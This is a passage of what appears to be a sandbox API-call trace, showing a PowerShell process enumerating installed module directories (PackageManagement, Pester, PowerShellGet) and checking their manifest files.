[0159.316] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.xaml")) returned 0xffffffff [0159.316] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.ni.dll")) returned 0xffffffff [0159.316] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\Microsoft.PowerShell.Operation.Validation.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\microsoft.powershell.operation.validation\\microsoft.powershell.operation.validation.dll")) returned 0xffffffff [0159.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.316] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0159.316] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", nBufferLength=0x3d, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement", lpFilePart=0x0) returned 0x3c [0159.316] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50eaa6c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d4290 [0159.317] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb50eaa6c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.317] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb512ac95, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b22f66e, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0159.317] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.317] FindClose (in: hFindFile=0x76d4290 | out: hFindFile=0x76d4290) returned 1 [0159.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.317] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0159.317] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0159.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.318] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a59065a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5da012f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5da012f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8fa)) returned 1 [0159.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.320] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0159.320] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0159.320] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0159.320] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", nBufferLength=0x5c, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1", lpFilePart=0x0) returned 0x5b [0159.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.320] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\1.0.0.1\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\1.0.0.1\\packagemanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x53861ec | out: lpFileInformation=0x53861ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a59065a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5da012f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5da012f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x8fa)) returned 1 [0159.321] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.321] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psd1")) returned 0xffffffff [0159.321] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.psm1")) returned 0xffffffff [0159.321] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.cdxml")) returned 0xffffffff [0159.321] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.xaml")) returned 0xffffffff [0159.321] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.ni.dll")) returned 0xffffffff [0159.321] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\PackageManagement.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\packagemanagement\\packagemanagement.dll")) returned 0xffffffff [0159.321] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.321] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x32 [0159.321] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", nBufferLength=0x32, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester", lpFilePart=0x0) returned 0x31 [0159.321] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x462363f6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x462363f6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d4350 [0159.322] FindNextFileW (in: hFindFile=0x76d4350, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x462363f6, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x462363f6, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.322] FindNextFileW (in: hFindFile=0x76d4350, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xb51e338c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x31fa7f6, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.3.5", cAlternateFileName="3351CC~1.5")) returned 1 [0159.322] FindNextFileW (in: hFindFile=0x76d4350, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb529e7f3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a5b68c4, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.4.0", cAlternateFileName="34AE2D~1.0")) returned 1 [0159.322] FindNextFileW (in: hFindFile=0x76d4350, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.322] FindClose (in: hFindFile=0x76d4350 | out: hFindFile=0x76d4350) returned 1 [0159.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.332] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0159.332] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0159.332] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.332] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fbcba3, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96fbcba3, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96fbcba3, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0159.369] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.369] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0159.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0159.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0159.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0159.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.370] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.4.0\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.4.0\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5387ddc | out: lpFileInformation=0x5387ddc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96fbcba3, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96fbcba3, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96fbcba3, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1014)) returned 1 [0159.370] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0159.370] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0159.370] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.370] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0159.376] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.376] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0159.376] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0159.376] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x44 [0159.376] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", nBufferLength=0x44, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1", lpFilePart=0x0) returned 0x43 [0159.376] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.376] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\3.3.5\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\3.3.5\\pester.psd1"), fInfoLevelId=0x0, lpFileInformation=0x538808c | out: lpFileInformation=0x538808c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4efce146, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4efce146, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4efce146, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x35e5)) returned 1 [0159.377] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea98) returned 1 [0159.377] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psd1")) returned 0xffffffff [0159.377] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.psm1" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.psm1")) returned 0xffffffff [0159.377] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.cdxml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.cdxml")) returned 0xffffffff [0159.377] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.xaml" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.xaml")) returned 0xffffffff [0159.377] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.ni.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.ni.dll")) returned 0xffffffff [0159.377] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\Pester.dll" (normalized: "c:\\program files\\windowspowershell\\modules\\pester\\pester.dll")) returned 0xffffffff [0159.377] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86deae4) returned 1 [0159.377] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x39 [0159.377] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", nBufferLength=0x39, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet", lpFilePart=0x0) returned 0x38 [0159.377] FindFirstFileW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\*", lpFindFileData=0x86de80c | out: lpFindFileData=0x86de80c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53eacff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76d4290 [0159.378] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53eacff, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17bfc901, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.378] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb53ec4f8, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8b2558c7, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1.0.0.1", cAlternateFileName="100~1.1")) returned 1 [0159.378] FindNextFileW (in: hFindFile=0x76d4290, lpFindFileData=0x86de818 | out: lpFindFileData=0x86de818*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0159.378] FindClose (in: hFindFile=0x76d4290 | out: hFindFile=0x76d4290) returned 1 [0159.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaa0) returned 1 [0159.378] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86deaac) returned 1 [0159.378] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0159.378] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0159.378] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea78) returned 1 [0159.378] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x86deaf4 | out: lpFileInformation=0x86deaf4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xadf)) returned 1 [0159.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x86dea74) returned 1 [0159.383] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0159.383] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0159.383] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x54 [0159.383] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", nBufferLength=0x54, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1", lpFilePart=0x0) returned 0x53 [0159.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x86dea9c) returned 1 [0159.383] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\1.0.0.1\\PowerShellGet.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\powershellget\\1.0.0.1\\powershellget.psd1"), fInfoLevelId=0x0, lpFileInformation=0x5389748 | out: lpFileInformation=0x5389748*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a64f261, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5dec600, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5dec600, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, 